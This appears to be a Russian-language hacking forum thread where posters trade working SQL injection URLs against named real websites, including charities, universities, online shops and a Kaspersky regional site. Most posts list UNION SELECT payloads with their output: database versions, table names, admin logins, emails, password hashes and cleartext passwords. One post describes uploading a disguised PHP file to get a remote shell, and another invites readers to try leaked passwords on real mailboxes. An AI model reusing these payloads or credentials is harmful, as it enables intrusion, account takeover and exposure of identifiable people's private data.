Искал где поиграть в билот, билот не нащёл, но со скулей поигрался Code: http://www.gambler.ru/tours/protocol.php?tourid=129903&teamid=-1+UNION+SELECT+1,concat_ws(0x3a,VERSION(),USER(),DATABASE()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51-- Code: 5.0.51a-log:gambread@localhost:gambler
Code: http://www.dddhouse.com/v3/product_list.php?CategoryID=-1/**/union/**/select/**/1,1,1,1,1,1,1,1/* Code: http://www.ransomesjacobsen.com/product_list.php?t=category&id=-3+union+select+1,2/* Code: http://california.preferredjobs.com/profiles/profilesubmitrez.asp?number=1+or+1=(SELECT+TOP+1+Password+from+artUsersAdmin))-- Таблицы syssegments sysconstraints jobs websjobads ASPLoginUserTbl JobFair affiliates approved_jobs Articles artUsers artUsersAdmin builderjobs categories Comments dtproperties email employers employers_old interns JobFair2 jobs2 jobscats jobsstored jobstemp messages Months newsletter numberjobs Posts rbe rls_jobs unapproved_jobs unpaid_affiliates USER_NOTE USER_SEARCH USER_WISH webs
Code: http://www.pku.org/pages/news.php?id=408+UNION+SELECT+1,2,concat_ws(0x3a,password,email)+FROM+member/* 4.1.22-standardku_@localhostku_db1 Code: http://www.aupe.org/in_the_news/news.php?id=-96+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,CONCAT_WS(0x3a,version(),user(),database()),20,21/* 4.0.18:root@localhost:aupe Code: http://www.globalwaterfoundation.org/news.php?id=-1+UNION+SELECT+1,2,concat_ws(0x3a,VERSION(),USER(),DATABASE())/* VERSION 5
Code: http://www.greenecountyfoundation.org/news.php?id=-10+union+select+1,2,version(),4,5-- 5.0.51a-community-log
Code: http://www.tgchat.co.uk/profile.php?id=-146+union+select+1,version(),3,4,5,6,7,8,9,10,11/* 5.0.45 некоторые таблицы... Code: PrivatePictures new_access new_authmap new_filters new_forum new_profile_fields new_profile_values new_system new_users ----------- Code: http://www.fergusonhill.co.uk/product_details.php?id=7+union+select+1,2,3,4,5,6,7,8,9,version(),11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86/* 4.1.22-standard ----------- Code: http://www.forensicrecords.co.uk/artistdetail.php?id=-216+union+select+1,version(),3,4/* 5.0.27 ---------- Code: http://www.welovemarlborough.co.uk/marlborough_news.php?id=-88++union+select+1,password,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26+from+users/* ---------- Code: http://fat-cat.co.uk/fatcat/artistInfo.php?id=-53++union+select+1,login,3,4,5,6,7+from+users/* iwantiwantiwant:Seiji25x ---------- mysql.user: root:*5D769374F92AB78666CB6CDADBE62DB99DBE8411 ---------- Code: http://www.snseurope.com/snslink/news/news-full.php?id=-3565+union+select+1,2,3,4,5,concat(username,0x3a,password),7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+users/*
Dbname: mayores Version: 5.0.20a-log User: mayores@localhost http://www.mayores.uji.es/joomla/ http://www.mayores.uji.es/forum/
http://www.kaspersky.ee/ ля-ля-ля Code: http://www.kaspersky.ee/index.php?area=1&p=gallery&action=showimages&galid=-1+union+select+0,concat_ws(0x2F,uname,email,pass),2+from+kpro_user+where+ugroup=1+limit+0,1 http://www.kaspersky.ee/admin/ leroi/[email protected]/c263dbf51a63271ae226609fc8d8cace:star59 vasja/[email protected]/046833087b7f4017c7e9c9644176fed1 kaspersky/[email protected]/92b36ff295fc38a4a2e773e19d6b3b34 sky_pets/[email protected]/cb2513e0bbfc31544af7948592527bd0 kass_ru/[email protected]/7c3d596ed03ab9116c547b0eb678b247:aaaaaa
Code: http://www.kelbike.fr/search.php?q=deda&pmin=&pmax=&brand=&limite=80&ps=&po=&pv=&ls=0&ct=-1/**/UNION/**/SELECT/**/VERSION(),2,3/**/LIMIT/**/1,1/* 5.0.32-Debian_7etch6-log Code: http://www.kelbike.fr/search.php?q=deda&pmin=&pmax=&brand=&limite=80&ps=&po=&pv=&ls=0&ct=-1/**/UNION/**/SELECT/**/CONCAT_WS(0x3A,user_nom,user_pwd),2,3/**/FROM/**/dc_user/**/LIMIT/**/1,1/* admin:kelbike1 админку не нашел Code: http://www.hrusa.org/field/listings.php?catid=-1+union+select+concat_ws(0x3a,version(),user(),database()),2,3,4/* 5.0.45:hrusa@lawweb2-private:hrusa Code: http://www.hrusa.org/field/listings.php?catid=-1+union+select+concat_ws(0x3a,name,password),2,3,4+FROM+users+limit+0,1/* admin:hrcalendar к админке не подходит
хекаем .edu на всех 5-я версия мускула... http://www.stots.edu/article.php?id=-46+union+select++1,2,concat(user,0x3a,password,0x3a,host),4,5,6,7,8+from+mysql.user+limit+1,1/* 5.0.27-standard в теме "Расшифровка хешей" я выкладывал выуженные хеши, там даже мне их частично расшифровали... http://www.psych.utah.edu/people/gradstud.php?id=-131+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,15,16,17,18/* 5.0.22-log 3 http://dma.ucla.edu/people/faculty.php?ID=-9+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16/* 5.0.45 4
итак. Нашел я сайтик: http://baltportal.ru Общая инфа: Таблицы: Некоторые поля из талицы auth_user: name, nik, password, admin, email Чувак, который походу админ: Дмитрий Шахов1, Администратор, pwdportalpwd, [email protected] Не знаю почему, но с этими данными админский доступ получить не смог (. Я не отчаялся. Получил пользовательский доступ и пошел рыть дальше. В редактировании профиля предлагается загрузить картинку. Если ты грузишь не картинку а пхп-файл, то это жестко пресекается ))) А если файл назвать не файл.пхп, а файл.жпг.пхп, то все чудесно проходит и ты получаешь удаленный шелл. Проблема только в том, что у этого шела права ограниченные (видимо там права более менее нормально на папку с картинками настроили). В общем если кто-то чего-то дальше раскопает тут, буду рад получить доп. инфу в личку. Кстати, если кому-то нужна программа для ускорения поиска таблиц и генерации инъекций, пишите в личку (SQLInjectHelper).
http://mobila.kz вообщемс... там весь сайт ... одна большая скуля..... удобный вывод в цикле .. не может не порадовать глаз.... PR тИЦ Alexa 3 20 1773095
БЕЛОРУССКАЯ АССОЦИАЦИЯ СОЦИАЛЬНЫХ РАБОТНИКОВ http://basw-ngo-by.net/ Фух бла, ну и заепался я его исследовать. Таблицы какие-то странные ваще вконце пошли. Но сам результат: Code: http://basw-ngo-by.net/page.php?parent=0&issue_id=2613+union+select+1,2,version(),4,5,6,7,8,9,10,11,12-- 5.0.51a-community-log Таблиц всего 59 насчитал. Перечислять тут небуду, т.к. займет много места) Главное - в таблице basw_ru_subscribers был обнаружен столбец - pass. Чем она собсна мя и заинтересовала: Code: http://basw-ngo-by.net/page.php?parent=0&issue_id=2613+union+select+1,2,column_name,4,5,6,7,8,9,10,11,12+from+information_schema.columns+where+table_name=0x626173775f72755f7375627363726962657273+limit+0,1-- Code: [b]id[/B] name last_name [b]email pass[/b] group2 name_org time Code: http://basw-ngo-by.net/page.php?parent=0&issue_id=2613+union+select+1,2,concat_ws(id,0x3a,name,0x3a,pass),4,5,6,7,8,9,10,11,12+from+basw_ru_subscribers+limit+0,1-- Ну и пошли логины и пассы (в открытом виде) Раз сайт "Ассоциация.....", то вполне возможно ассоциировать етот пароль с настоящим мылом. Кому захочется - пробуйте
knock.lv - интернет-магазин. 5.0.51a-community:knok_knock@localhost:knok_knock Code: http://www.knock.lv/view_more.php?action=view_s&product_id=269+union+select+1,2,3,concat_ws(0x3a,username,password),5,6,7,8,9,10+from+users--
Code: http://blueshop.ru/details.php?product_id=-1+union+select+1,2,3,4,5,6,7,table_name,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+information_schema.tables--
- COLLATIONS - COLLATION_CHARACTER_SET_APPLICABILITY - COLUMNS - COLUMN_PRIVILEGES - ENGINES - EVENTS - FILES - GLOBAL_STATUS - GLOBAL_VARIABLES - KEY_COLUMN_USAGE - PARTITIONS - PLUGINS - PROCESSLIST - REFERENTIAL_CONSTRAINTS ... - USERS А вот и поля.. : - login - passwd - fio - fname - ffname - sname - company - dolj - sex - country - region - address - telephone - fax - email - url дальше не стал... Пароли в открытом виде... Приведу парочку Авторизация тут
http://www.bt-shop.ru/section_output.php?id=-1+union+select+1,2,3,version(),5,6,7/* version:4 http://www.intexusa.ru/forum/read.php?id=99999999999+union+select+1,2,3,4,5,6,7-- Нет принтабельных http://www.lory-press.ru/book.php?id=1+and+substring(@@version,1,1)=3 version:3
Code: http://www.pku.org/pages/news.php?id...cat_ws(0x3a,pa ssword,email)+FROM+member-- Code: http://www.snseurope.com/snslink/new...17,18,19,20+fr om+users-- Code: http://www.stots.edu/article.php?id=...a,password,0x3 a,host),4,5,6,7,8+from+mysql.user+limit+1,1--
